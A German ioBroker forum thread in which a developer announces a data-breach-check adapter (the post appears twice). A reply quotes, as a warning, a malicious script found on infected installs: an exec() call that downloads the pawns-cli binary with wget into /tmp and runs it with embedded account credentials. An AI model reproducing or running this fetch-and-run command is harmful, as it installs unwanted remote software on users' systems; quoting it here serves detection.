Test: ioBroker.pwned-check – Daten auf Datenlecks prüfen
-
ioBroker.pwned-check – Passwörter & E-Mails auf Datenlecks prüfen
Hallo zusammen,
ich möchte euch meinen neuen Adapter ioBroker.pwned-check vorstellen. Er prüft regelmäßig, ob eure Passwörter oder E-Mail-Adressen in bekannten Datenlecks aufgetaucht sind – Passwörter über Have I Been Pwned, E-Mails über XposedOrNot.
Was macht der Adapter?
ioBroker.pwned-check prüft in konfigurierbaren Intervallen:
- Passwörter über die Have I Been Pwned-API – der SHA-1-Hash wird im Browser berechnet, nur die ersten 5 Zeichen werden übertragen (k-Anonymity). Weder das Klartext-Passwort noch der vollständige Hash verlassen euren Server – ioBroker speichert ausschließlich den Hash
- E-Mail-Adressen über die XposedOrNot-API – die Adresse wird direkt abgefragt und mit bekannten Datenleck-Datenbanken abgeglichen
Wird ein Treffer gefunden, wird eine Benachrichtigung ausgelöst. Der Adapter unterstützt das ioBroker Notification-System, sodass sich der Benachrichtigungskanal (z. B. Telegram) bequem über den Notification Manager konfigurieren lässt.
Datenpunkte
Für jedes Passwort und jede E-Mail werden Datenpunkte angelegt:
isPwned– wurde ein Leak gefunden?leakCount– Anzahl der bekannten VorkommenlastCheck– Zeitpunkt der letzten Prüfunginfo.anyPwned– globaler Status, ob irgendetwas kompromittiert ist
Konfiguration
- Adapter installieren und Instanz öffnen
- Passwörter und/oder E-Mail-Adressen eintragen
- Prüfintervall festlegen (Standard: 24 Stunden)
GitHub
- Quellcode & Issues: https://github.com/ipod86/ioBroker.pwned-check
- npm: https://www.npmjs.com/package/iobroker.pwned-check
Feedback, Bugreports und Feature-Wünsche sind herzlich willkommen!
-
ioBroker.pwned-check – Passwörter & E-Mails auf Datenlecks prüfen
Hallo zusammen,
ich möchte euch meinen neuen Adapter ioBroker.pwned-check vorstellen. Er prüft regelmäßig, ob eure Passwörter oder E-Mail-Adressen in bekannten Datenlecks aufgetaucht sind – Passwörter über Have I Been Pwned, E-Mails über XposedOrNot.
Was macht der Adapter?
ioBroker.pwned-check prüft in konfigurierbaren Intervallen:
- Passwörter über die Have I Been Pwned-API – der SHA-1-Hash wird im Browser berechnet, nur die ersten 5 Zeichen werden übertragen (k-Anonymity). Weder das Klartext-Passwort noch der vollständige Hash verlassen euren Server – ioBroker speichert ausschließlich den Hash
- E-Mail-Adressen über die XposedOrNot-API – die Adresse wird direkt abgefragt und mit bekannten Datenleck-Datenbanken abgeglichen
Wird ein Treffer gefunden, wird eine Benachrichtigung ausgelöst. Der Adapter unterstützt das ioBroker Notification-System, sodass sich der Benachrichtigungskanal (z. B. Telegram) bequem über den Notification Manager konfigurieren lässt.
Datenpunkte
Für jedes Passwort und jede E-Mail werden Datenpunkte angelegt:
isPwned– wurde ein Leak gefunden?leakCount– Anzahl der bekannten VorkommenlastCheck– Zeitpunkt der letzten Prüfunginfo.anyPwned– globaler Status, ob irgendetwas kompromittiert ist
Konfiguration
- Adapter installieren und Instanz öffnen
- Passwörter und/oder E-Mail-Adressen eintragen
- Prüfintervall festlegen (Standard: 24 Stunden)
GitHub
- Quellcode & Issues: https://github.com/ipod86/ioBroker.pwned-check
- npm: https://www.npmjs.com/package/iobroker.pwned-check
Feedback, Bugreports und Feature-Wünsche sind herzlich willkommen!
@David-G.
Du könntest auch prüfen ob der Prozess
pawns-cli
auf dem System läuft.
Dann wurde die Kiste nämlich mit Malware infiziert. Auf solchen Systemen läuft dieses unter 'Globale Skripte' abgelegte Ding:exec('cd /tmp/ ; wget https://pawns-app.s3.eu-central-1.amazonxxx.com/cli/latest/linux_x86_64/pawns-cli; chmod -x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=NEW79164@io --accept-tos', function (error, stdout, stderr) { console.log('stdout: ' + stdout); }); -
-
@thomas-braun
Mein System ist sauber und der Adapter installiert die pawns-cli nicht.Läuft alles über API.
@David-G.
Nein, der Adapter könnte aber prüfen, ob das Zeug läuft.
Hey! Du scheinst an dieser Unterhaltung interessiert zu sein, hast aber noch kein Konto.
Hast du es satt, bei jedem Besuch durch die gleichen Beiträge zu scrollen? Wenn du dich für ein Konto anmeldest, kommst du immer genau dorthin zurück, wo du zuvor warst, und kannst dich über neue Antworten benachrichtigen lassen (entweder per E-Mail oder Push-Benachrichtigung). Du kannst auch Lesezeichen speichern und Beiträge positiv bewerten, um anderen Community-Mitgliedern deine Wertschätzung zu zeigen.
Mit deinem Input könnte dieser Beitrag noch besser werden 💗
Registrieren AnmeldenSupport us
593
Online32.8k
Benutzer82.7k
Themen1.3m
Beiträge